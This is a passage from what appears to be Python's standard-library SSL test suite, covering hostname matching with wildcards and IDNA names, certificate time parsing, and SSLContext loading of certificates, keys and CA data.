fail(cert, 'bar.foo.a.com')
fail(cert, 'a.com')
fail(cert, 'Xa.com')
fail(cert, '.a.com')
# only match one left-most wildcard
cert = {'subject': ((('commonName', 'f*.com'),),)}
ok(cert, 'foo.com')
ok(cert, 'f.com')
fail(cert, 'bar.com')
fail(cert, 'foo.a.com')
fail(cert, 'bar.foo.com')
# NULL bytes are bad, CVE-2013-4073
cert = {'subject': ((('commonName',
'null.python.org\x00example.org'),),)}
ok(cert, 'null.python.org\x00example.org') # or raise an error?
fail(cert, 'example.org')
fail(cert, 'null.python.org')
# error cases with wildcards
cert = {'subject': ((('commonName', '*.*.a.com'),),)}
fail(cert, 'bar.foo.a.com')
fail(cert, 'a.com')
fail(cert, 'Xa.com')
fail(cert, '.a.com')
cert = {'subject': ((('commonName', 'a.*.com'),),)}
fail(cert, 'a.foo.com')
fail(cert, 'a..com')
fail(cert, 'a.com')
# wildcard doesn't match IDNA prefix 'xn--'
idna = u'püthon.python.org'.encode("idna").decode("ascii")
cert = {'subject': ((('commonName', idna),),)}
ok(cert, idna)
cert = {'subject': ((('commonName', 'x*.python.org'),),)}
fail(cert, idna)
cert = {'subject': ((('commonName', 'xn--p*.python.org'),),)}
fail(cert, idna)
# wildcard in first fragment and IDNA A-labels in sequent fragments
# are supported.
idna = u'www*.pythön.org'.encode("idna").decode("ascii")
cert = {'subject': ((('commonName', idna),),)}
ok(cert, u'www.pythön.org'.encode("idna").decode("ascii"))
ok(cert, u'www1.pythön.org'.encode("idna").decode("ascii"))
fail(cert, u'ftp.pythön.org'.encode("idna").decode("ascii"))
fail(cert, u'pythön.org'.encode("idna").decode("ascii"))
# Slightly fake real-world example
cert = {'notAfter': 'Jun 26 21:41:46 2011 GMT',
'subject': ((('commonName', 'linuxfrz.org'),),),
'subjectAltName': (('DNS', 'linuxfr.org'),
('DNS', 'linuxfr.com'),
('othername', '<unsupported>'))}
ok(cert, 'linuxfr.org')
ok(cert, 'linuxfr.com')
# Not a "DNS" entry
fail(cert, '<unsupported>')
# When there is a subjectAltName, commonName isn't used
fail(cert, 'linuxfrz.org')
# A pristine real-world example
cert = {'notAfter': 'Dec 18 23:59:59 2011 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),),
(('commonName', 'mail.google.com'),))}
ok(cert, 'mail.google.com')
fail(cert, 'gmail.com')
# Only commonName is considered
fail(cert, 'California')
# Neither commonName nor subjectAltName
cert = {'notAfter': 'Dec 18 23:59:59 2011 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),))}
fail(cert, 'mail.google.com')
# No DNS entry in subjectAltName but a commonName
cert = {'notAfter': 'Dec 18 23:59:59 2099 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('commonName', 'mail.google.com'),)),
'subjectAltName': (('othername', 'blabla'), )}
ok(cert, 'mail.google.com')
# No DNS entry subjectAltName and no commonName
cert = {'notAfter': 'Dec 18 23:59:59 2099 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),)),
'subjectAltName': (('othername', 'blabla'),)}
fail(cert, 'google.com')
# Empty cert / no cert
self.assertRaises(ValueError, ssl.match_hostname, None, 'example.com')
self.assertRaises(ValueError, ssl.match_hostname, {}, 'example.com')
# Issue #17980: avoid denials of service by refusing more than one
# wildcard per fragment.
cert = {'subject': ((('commonName', 'a*b.com'),),)}
ok(cert, 'axxb.com')
cert = {'subject': ((('commonName', 'a*b.co*'),),)}
fail(cert, 'axxb.com')
cert = {'subject': ((('commonName', 'a*b*.com'),),)}
with self.assertRaises(ssl.CertificateError) as cm:
ssl.match_hostname(cert, 'axxbxxc.com')
self.assertIn("too many wildcards", str(cm.exception))
def test_server_side(self):
# server_hostname doesn't work for server sockets
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
with closing(socket.socket()) as sock:
self.assertRaises(ValueError, ctx.wrap_socket, sock, True,
server_hostname="some.hostname")
def test_unknown_channel_binding(self):
# should raise ValueError for unknown type
s = socket.socket(socket.AF_INET)
with closing(ssl.wrap_socket(s)) as ss:
with self.assertRaises(ValueError):
ss.get_channel_binding("unknown-type")
@unittest.skipUnless("tls-unique" in ssl.CHANNEL_BINDING_TYPES,
"'tls-unique' channel binding not available")
def test_tls_unique_channel_binding(self):
# unconnected should return None for known type
s = socket.socket(socket.AF_INET)
with closing(ssl.wrap_socket(s)) as ss:
self.assertIsNone(ss.get_channel_binding("tls-unique"))
# the same for server-side
s = socket.socket(socket.AF_INET)
with closing(ssl.wrap_socket(s, server_side=True, certfile=CERTFILE)) as ss:
self.assertIsNone(ss.get_channel_binding("tls-unique"))
def test_get_default_verify_paths(self):
paths = ssl.get_default_verify_paths()
self.assertEqual(len(paths), 6)
self.assertIsInstance(paths, ssl.DefaultVerifyPaths)
with support.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
paths = ssl.get_default_verify_paths()
self.assertEqual(paths.cafile, CERTFILE)
self.assertEqual(paths.capath, CAPATH)
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_enum_certificates(self):
self.assertTrue(ssl.enum_certificates("CA"))
self.assertTrue(ssl.enum_certificates("ROOT"))
self.assertRaises(TypeError, ssl.enum_certificates)
self.assertRaises(WindowsError, ssl.enum_certificates, "")
trust_oids = set()
for storename in ("CA", "ROOT"):
store = ssl.enum_certificates(storename)
self.assertIsInstance(store, list)
for element in store:
self.assertIsInstance(element, tuple)
self.assertEqual(len(element), 3)
cert, enc, trust = element
self.assertIsInstance(cert, bytes)
self.assertIn(enc, {"x509_asn", "pkcs_7_asn"})
self.assertIsInstance(trust, (set, bool))
if isinstance(trust, set):
trust_oids.update(trust)
serverAuth = "1.3.6.1.5.5.7.3.1"
self.assertIn(serverAuth, trust_oids)
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_enum_crls(self):
self.assertTrue(ssl.enum_crls("CA"))
self.assertRaises(TypeError, ssl.enum_crls)
self.assertRaises(WindowsError, ssl.enum_crls, "")
crls = ssl.enum_crls("CA")
self.assertIsInstance(crls, list)
for element in crls:
self.assertIsInstance(element, tuple)
self.assertEqual(len(element), 2)
self.assertIsInstance(element[0], bytes)
self.assertIn(element[1], {"x509_asn", "pkcs_7_asn"})
def test_asn1object(self):
expected = (129, 'serverAuth', 'TLS Web Server Authentication',
'1.3.6.1.5.5.7.3.1')
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.1')
self.assertEqual(val, expected)
self.assertEqual(val.nid, 129)
self.assertEqual(val.shortname, 'serverAuth')
self.assertEqual(val.longname, 'TLS Web Server Authentication')
self.assertEqual(val.oid, '1.3.6.1.5.5.7.3.1')
self.assertIsInstance(val, ssl._ASN1Object)
self.assertRaises(ValueError, ssl._ASN1Object, 'serverAuth')
val = ssl._ASN1Object.fromnid(129)
self.assertEqual(val, expected)
self.assertIsInstance(val, ssl._ASN1Object)
self.assertRaises(ValueError, ssl._ASN1Object.fromnid, -1)
with self.assertRaisesRegexp(ValueError, "unknown NID 100000"):
ssl._ASN1Object.fromnid(100000)
for i in range(1000):
try:
obj = ssl._ASN1Object.fromnid(i)
except ValueError:
pass
else:
self.assertIsInstance(obj.nid, int)
self.assertIsInstance(obj.shortname, str)
self.assertIsInstance(obj.longname, str)
self.assertIsInstance(obj.oid, (str, type(None)))
val = ssl._ASN1Object.fromname('TLS Web Server Authentication')
self.assertEqual(val, expected)
self.assertIsInstance(val, ssl._ASN1Object)
self.assertEqual(ssl._ASN1Object.fromname('serverAuth'), expected)
self.assertEqual(ssl._ASN1Object.fromname('1.3.6.1.5.5.7.3.1'),
expected)
with self.assertRaisesRegexp(ValueError, "unknown object 'serverauth'"):
ssl._ASN1Object.fromname('serverauth')
def test_purpose_enum(self):
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.1')
self.assertIsInstance(ssl.Purpose.SERVER_AUTH, ssl._ASN1Object)
self.assertEqual(ssl.Purpose.SERVER_AUTH, val)
self.assertEqual(ssl.Purpose.SERVER_AUTH.nid, 129)
self.assertEqual(ssl.Purpose.SERVER_AUTH.shortname, 'serverAuth')
self.assertEqual(ssl.Purpose.SERVER_AUTH.oid,
'1.3.6.1.5.5.7.3.1')
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.2')
self.assertIsInstance(ssl.Purpose.CLIENT_AUTH, ssl._ASN1Object)
self.assertEqual(ssl.Purpose.CLIENT_AUTH, val)
self.assertEqual(ssl.Purpose.CLIENT_AUTH.nid, 130)
self.assertEqual(ssl.Purpose.CLIENT_AUTH.shortname, 'clientAuth')
self.assertEqual(ssl.Purpose.CLIENT_AUTH.oid,
'1.3.6.1.5.5.7.3.2')
def test_unsupported_dtls(self):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.addCleanup(s.close)
with self.assertRaises(NotImplementedError) as cx:
ssl.wrap_socket(s, cert_reqs=ssl.CERT_NONE)
self.assertEqual(str(cx.exception), "only stream sockets are supported")
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
with self.assertRaises(NotImplementedError) as cx:
ctx.wrap_socket(s)
self.assertEqual(str(cx.exception), "only stream sockets are supported")
def cert_time_ok(self, timestring, timestamp):
self.assertEqual(ssl.cert_time_to_seconds(timestring), timestamp)
def cert_time_fail(self, timestring):
with self.assertRaises(ValueError):
ssl.cert_time_to_seconds(timestring)
@unittest.skipUnless(utc_offset(),
'local time needs to be different from UTC')
def test_cert_time_to_seconds_timezone(self):
# Issue #19940: ssl.cert_time_to_seconds() returns wrong
# results if local timezone is not UTC
self.cert_time_ok("May 9 00:00:00 2007 GMT", 1178668800.0)
self.cert_time_ok("Jan 5 09:34:43 2018 GMT", 1515144883.0)
def test_cert_time_to_seconds(self):
timestring = "Jan 5 09:34:43 2018 GMT"
ts = 1515144883.0
self.cert_time_ok(timestring, ts)
# accept keyword parameter, assert its name
self.assertEqual(ssl.cert_time_to_seconds(cert_time=timestring), ts)
# accept both %e and %d (space or zero generated by strftime)
self.cert_time_ok("Jan 05 09:34:43 2018 GMT", ts)
# case-insensitive
self.cert_time_ok("JaN 5 09:34:43 2018 GmT", ts)
self.cert_time_fail("Jan 5 09:34 2018 GMT") # no seconds
self.cert_time_fail("Jan 5 09:34:43 2018") # no GMT
self.cert_time_fail("Jan 5 09:34:43 2018 UTC") # not GMT timezone
self.cert_time_fail("Jan 35 09:34:43 2018 GMT") # invalid day
self.cert_time_fail("Jon 5 09:34:43 2018 GMT") # invalid month
self.cert_time_fail("Jan 5 24:00:00 2018 GMT") # invalid hour
self.cert_time_fail("Jan 5 09:60:43 2018 GMT") # invalid minute
newyear_ts = 1230768000.0
# leap seconds
self.cert_time_ok("Dec 31 23:59:60 2008 GMT", newyear_ts)
# same timestamp
self.cert_time_ok("Jan 1 00:00:00 2009 GMT", newyear_ts)
self.cert_time_ok("Jan 5 09:34:59 2018 GMT", 1515144899)
# allow 60th second (even if it is not a leap second)
self.cert_time_ok("Jan 5 09:34:60 2018 GMT", 1515144900)
# allow 2nd leap second for compatibility with time.strptime()
self.cert_time_ok("Jan 5 09:34:61 2018 GMT", 1515144901)
self.cert_time_fail("Jan 5 09:34:62 2018 GMT") # invalid seconds
# no special treatement for the special value:
# 99991231235959Z (rfc 5280)
self.cert_time_ok("Dec 31 23:59:59 9999 GMT", 253402300799.0)
@support.run_with_locale('LC_ALL', '')
def test_cert_time_to_seconds_locale(self):
# `cert_time_to_seconds()` should be locale independent
def local_february_name():
return time.strftime('%b', (1, 2, 3, 4, 5, 6, 0, 0, 0))
if local_february_name().lower() == 'feb':
self.skipTest("locale-specific month name needs to be "
"different from C locale")
# locale-independent
self.cert_time_ok("Feb 9 00:00:00 2007 GMT", 1170979200.0)
self.cert_time_fail(local_february_name() + " 9 00:00:00 2007 GMT")
class ContextTests(unittest.TestCase):
@skip_if_broken_ubuntu_ssl
def test_constructor(self):
for protocol in PROTOCOLS:
ssl.SSLContext(protocol)
self.assertRaises(TypeError, ssl.SSLContext)
self.assertRaises(ValueError, ssl.SSLContext, -1)
self.assertRaises(ValueError, ssl.SSLContext, 42)
@skip_if_broken_ubuntu_ssl
def test_protocol(self):
for proto in PROTOCOLS:
ctx = ssl.SSLContext(proto)
self.assertEqual(ctx.protocol, proto)
def test_ciphers(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.set_ciphers("ALL")
ctx.set_ciphers("DEFAULT")
with self.assertRaisesRegexp(ssl.SSLError, "No cipher can be selected"):
ctx.set_ciphers("^$:,;?*'dorothyx")
@skip_if_broken_ubuntu_ssl
def test_options(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
# OP_ALL | OP_NO_SSLv2 | OP_NO_SSLv3 is the default value
default = (ssl.OP_ALL | ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3)
if not IS_LIBRESSL and ssl.OPENSSL_VERSION_INFO >= (1, 1, 0):
default |= ssl.OP_NO_COMPRESSION
self.assertEqual(default, ctx.options)
ctx.options |= ssl.OP_NO_TLSv1
self.assertEqual(default | ssl.OP_NO_TLSv1, ctx.options)
if can_clear_options():
ctx.options = (ctx.options & ~ssl.OP_NO_TLSv1)
self.assertEqual(default, ctx.options)
ctx.options = 0
# Ubuntu has OP_NO_SSLv3 forced on by default
self.assertEqual(0, ctx.options & ~ssl.OP_NO_SSLv3)
else:
with self.assertRaises(ValueError):
ctx.options = 0
def test_verify_mode(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
# Default value
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
ctx.verify_mode = ssl.CERT_OPTIONAL
self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
ctx.verify_mode = ssl.CERT_REQUIRED
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.verify_mode = ssl.CERT_NONE
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
with self.assertRaises(TypeError):
ctx.verify_mode = None
with self.assertRaises(ValueError):
ctx.verify_mode = 42
@unittest.skipUnless(have_verify_flags(),
"verify_flags need OpenSSL > 0.9.8")
def test_verify_flags(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
# default value
tf = getattr(ssl, "VERIFY_X509_TRUSTED_FIRST", 0)
self.assertEqual(ctx.verify_flags, ssl.VERIFY_DEFAULT | tf)
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_LEAF
self.assertEqual(ctx.verify_flags, ssl.VERIFY_CRL_CHECK_LEAF)
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_CHAIN
self.assertEqual(ctx.verify_flags, ssl.VERIFY_CRL_CHECK_CHAIN)
ctx.verify_flags = ssl.VERIFY_DEFAULT
self.assertEqual(ctx.verify_flags, ssl.VERIFY_DEFAULT)
# supports any value
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_LEAF | ssl.VERIFY_X509_STRICT
self.assertEqual(ctx.verify_flags,
ssl.VERIFY_CRL_CHECK_LEAF | ssl.VERIFY_X509_STRICT)
with self.assertRaises(TypeError):
ctx.verify_flags = None
def test_load_cert_chain(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
# Combined key and cert in a single file
ctx.load_cert_chain(CERTFILE, keyfile=None)
ctx.load_cert_chain(CERTFILE, keyfile=CERTFILE)
self.assertRaises(TypeError, ctx.load_cert_chain, keyfile=CERTFILE)
with self.assertRaises(IOError) as cm:
ctx.load_cert_chain(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaisesRegexp(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(BADCERT)
with self.assertRaisesRegexp(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(EMPTYCERT)
# Separate key and cert
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_cert_chain(ONLYCERT, ONLYKEY)
ctx.load_cert_chain(certfile=ONLYCERT, keyfile=ONLYKEY)
ctx.load_cert_chain(certfile=BYTES_ONLYCERT, keyfile=BYTES_ONLYKEY)
with self.assertRaisesRegexp(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(ONLYCERT)
with self.assertRaisesRegexp(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(ONLYKEY)
with self.assertRaisesRegexp(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(certfile=ONLYKEY, keyfile=ONLYCERT)
# Mismatching key and cert
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with self.assertRaisesRegexp(ssl.SSLError, "key values mismatch"):
ctx.load_cert_chain(CAFILE_CACERT, ONLYKEY)
# Password protected key and cert
ctx.load_cert_chain(CERTFILE_PROTECTED, password=KEY_PASSWORD)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=KEY_PASSWORD.encode())
ctx.load_cert_chain(CERTFILE_PROTECTED,
password=bytearray(KEY_PASSWORD.encode()))
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED, KEY_PASSWORD)
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED, KEY_PASSWORD.encode())
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED,
bytearray(KEY_PASSWORD.encode()))
with self.assertRaisesRegexp(TypeError, "should be a string"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=True)
with self.assertRaises(ssl.SSLError):
ctx.load_cert_chain(CERTFILE_PROTECTED, password="badpass")
with self.assertRaisesRegexp(ValueError, "cannot be longer"):
# openssl has a fixed limit on the password buffer.
# PEM_BUFSIZE is generally set to 1kb.
# Return a string larger than this.
ctx.load_cert_chain(CERTFILE_PROTECTED, password=b'a' * 102400)
# Password callback
def getpass_unicode():
return KEY_PASSWORD
def getpass_bytes():
return KEY_PASSWORD.encode()
def getpass_bytearray():
return bytearray(KEY_PASSWORD.encode())
def getpass_badpass():
return "badpass"
def getpass_huge():
return b'a' * (1024 * 1024)
def getpass_bad_type():
return 9
def getpass_exception():
raise Exception('getpass error')
class GetPassCallable:
def __call__(self):
return KEY_PASSWORD
def getpass(self):
return KEY_PASSWORD
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_unicode)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bytes)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bytearray)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=GetPassCallable())
ctx.load_cert_chain(CERTFILE_PROTECTED,
password=GetPassCallable().getpass)
with self.assertRaises(ssl.SSLError):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_badpass)
with self.assertRaisesRegexp(ValueError, "cannot be longer"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_huge)
with self.assertRaisesRegexp(TypeError, "must return a string"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bad_type)
with self.assertRaisesRegexp(Exception, "getpass error"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_exception)
# Make sure the password function isn't called if it isn't needed
ctx.load_cert_chain(CERTFILE, password=getpass_exception)
def test_load_verify_locations(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_verify_locations(CERTFILE)
ctx.load_verify_locations(cafile=CERTFILE, capath=None)
ctx.load_verify_locations(BYTES_CERTFILE)
ctx.load_verify_locations(cafile=BYTES_CERTFILE, capath=None)
ctx.load_verify_locations(cafile=BYTES_CERTFILE.decode('utf-8'))
self.assertRaises(TypeError, ctx.load_verify_locations)
self.assertRaises(TypeError, ctx.load_verify_locations, None, None, None)
with self.assertRaises(IOError) as cm:
ctx.load_verify_locations(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(IOError):
ctx.load_verify_locations(u'')
with self.assertRaisesRegexp(ssl.SSLError, "PEM lib"):
ctx.load_verify_locations(BADCERT)
ctx.load_verify_locations(CERTFILE, CAPATH)
ctx.load_verify_locations(CERTFILE, capath=BYTES_CAPATH)
# Issue #10989: crash if the second argument type is invalid
self.assertRaises(TypeError, ctx.load_verify_locations, None, True)
def test_load_verify_cadata(self):
# test cadata
with open(CAFILE_CACERT) as f:
cacert_pem = f.read().decode("ascii")
cacert_der = ssl.PEM_cert_to_DER_cert(cacert_pem)
with open(CAFILE_NEURONIO) as f:
neuronio_pem = f.read().decode("ascii")
neuronio_der = ssl.PEM_cert_to_DER_cert(neuronio_pem)
# test PEM
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 0)
ctx.load_verify_locations(cadata=cacert_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 1)
ctx.load_verify_locations(cadata=neuronio_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# cert already in hash table
ctx.load_verify_locations(cadata=neuronio_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# combined
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
combined = "\n".join((cacert_pem, neuronio_pem))
ctx.load_verify_locations(cadata=combined)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# with junk around the certs
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
combined = ["head", cacert_pem, "other", neuronio_pem, "again",
neuronio_pem, "tail"]
ctx.load_verify_locations(cadata="\n".join(combined))
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# test DER
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_verify_locations(cadata=cacert_der)
ctx.load_verify_locations(cadata=neuronio_der)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# cert already in hash table
ctx.load_verify_locations(cadata=cacert_der)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# combined
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
combined = b"".join((cacert_der, neuronio_der))
ctx.load_verify_locations(cadata=combined)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# error cases
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertRaises(TypeError, ctx.load_verify_locations, cadata=object)
with self.assertRaisesRegexp(ssl.SSLError, "no start line"):
ctx.load_verify_locations(cadata=u"broken")
with self.assertRaisesRegexp(ssl.SSLError, "not enough data"):
ctx.load_verify_locations(cadata=b"broken")
def test_load_dh_params(self):
filename = u'dhpäräm.pem'
fs_encoding = sys.getfilesystemencoding()
try:
filename.encode(fs_encoding)
except UnicodeEncodeError:
self.skipTest("filename %r cannot be encoded to the filesystem encoding %r" % (filename, fs_encoding))
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_dh_params(DHFILE)
if os.name != 'nt':
ctx.load_dh_params(BYTES_DHFILE)
self.assertRaises(TypeError, ctx.load_dh_params)
self.assertRaises(TypeError, ctx.load_dh_params, None)
with self.assertRaises(IOError) as cm:
ctx.load_dh_params(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(ssl.SSLError) as cm:
ctx.load_dh_params(CERTFILE)
with support.temp_dir() as d:
fname = os.path.join(d, filename)
shutil.copy(DHFILE, fname)
ctx.load_dh_params(fname)
@skip_if_broken_ubuntu_ssl
def test_session_stats(self):
for proto in PROTOCOLS:
ctx = ssl.SSLContext(proto)
self.assertEqual(ctx.session_stats(), {
'number': 0,
'connect': 0,
'connect_good': 0,
'connect_renegotiate': 0,
'accept': 0,
'accept_good': 0,
'accept_renegotiate': 0,
'hits': 0,
'misses': 0,
'timeouts': 0,
'cache_full': 0,
})
def test_set_default_verify_paths(self):
# There's not much we can do to test that it acts as expected,
# so just check it doesn't crash or raise an exception.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.set_default_verify_paths()
@unittest.skipUnless(ssl.HAS_ECDH, "ECDH disabled on this OpenSSL build")
def test_set_ecdh_curve(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.set_ecdh_curve("prime256v1")
ctx.set_ecdh_curve(b"prime256v1")
self.assertRaises(TypeError, ctx.set_ecdh_curve)
self.assertRaises(TypeError, ctx.set_ecdh_curve, None)
self.assertRaises(ValueError, ctx.set_ecdh_curve, "foo")
self.assertRaises(ValueError, ctx.set_ecdh_curve, b"foo")
@needs_sni
def test_sni_callback(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
# set_servername_callback expects a callable, or None
self.assertRaises(TypeError, ctx.set_servername_callback)
self.assertRaises(TypeError, ctx.set_servername_callback, 4)
self.assertRaises(TypeError, ctx.set_servername_callback, "")
self.assertRaises(TypeError, ctx.set_servername_callback, ctx)
def dummycallback(sock, servername, ctx):
pass
ctx.set_servername_callback(None)
ctx.set_servername_callback(dummycallback)
@needs_sni
def test_sni_callback_refcycle(self):
# Reference cycles through the servername callback are detected
# and cleared.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
def dummycallback(sock, servername, ctx, cycle=ctx):
pass
ctx.set_servername_callback(dummycallback)
wr = weakref.ref(ctx)
del ctx, dummycallback
gc.collect()
self.assertIs(wr(), None)
def test_cert_store_stats(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 0})
ctx.load_cert_chain(CERTFILE)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 0})
ctx.load_verify_locations(CERTFILE)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 1})
ctx.load_verify_locations(CAFILE_CACERT)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 1, 'crl': 0, 'x509': 2})
def test_get_ca_certs(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.get_ca_certs(), [])
# CERTFILE is not flagged as X509v3 Basic Constraints: CA:TRUE
ctx.load_verify_locations(CERTFILE)
self.assertEqual(ctx.get_ca_certs(), [])
# but CAFILE_CACERT is a CA cert
ctx.load_verify_locations(CAFILE_CACERT)
self.assertEqual(ctx.get_ca_certs(),
[{'issuer': ((('organizationName', 'Root CA'),),
(('organizationalUnitName', 'http://www.cacert.org'),),
(('commonName', 'CA Cert Signing Authority'),),
(('emailAddress', 'support@cacert.org'),)),
'notAfter': asn1time('Mar 29 12:29:49 2033 GMT'),
'notBefore': asn1time('Mar 30 12:29:49 2003 GMT'),
'serialNumber': '00',
'crlDistributionPoints': ('https://www.cacert.org/revoke.crl',),
'subject': ((('organizationName', 'Root CA'),),
(('organizationalUnitName', 'http://www.cacert.org'),),
(('commonName', 'CA Cert Signing Authority'),),
(('emailAddress', 'support@cacert.org'),)),
'version': 3}])
with open(CAFILE_CACERT) as f:
pem = f.read()
der = ssl.PEM_cert_to_DER_cert(pem)
self.assertEqual(ctx.get_ca_certs(True), [der])
def test_load_default_certs(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_default_certs()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_default_certs(ssl.Purpose.SERVER_AUTH)
ctx.load_default_certs()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_default_certs(ssl.Purpose.CLIENT_AUTH)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertRaises(TypeError, ctx.load_default_certs, None)
self.assertRaises(TypeError, ctx.load_default_certs, 'SERVER_AUTH')
@unittest.skipIf(sys.platform == "win32", "not-Windows specific")
@unittest.skipIf(IS_LIBRESSL, "LibreSSL doesn't support env vars")
def test_load_default_certs_env(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with support.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
ctx.load_default_certs()
self.assertEqual(ctx.cert_store_stats(), {"crl": 0, "x509": 1, "x509_ca": 0})
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_load_default_certs_env_windows(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_default_certs()
stats = ctx.cert_store_stats()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with support.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
ctx.load_default_certs()
stats["x509"] += 1
self.assertEqual(ctx.cert_store_stats(), stats)
def test_create_default_context(self):
ctx = ssl.create_default_context()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
self.assertEqual(
ctx.options & getattr(ssl, "OP_NO_COMPRESSION", 0),
getattr(ssl, "OP_NO_COMPRESSION", 0),
)
with open(SIGNING_CA) as f:
cadata = f.read().decode("ascii")
ctx = ssl.create_default_context(cafile=SIGNING_CA, capath=CAPATH,
cadata=cadata)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
self.assertEqual(
ctx.options & getattr(ssl, "OP_NO_COMPRESSION", 0),
getattr(ssl, "OP_NO_COMPRESSION", 0),
)
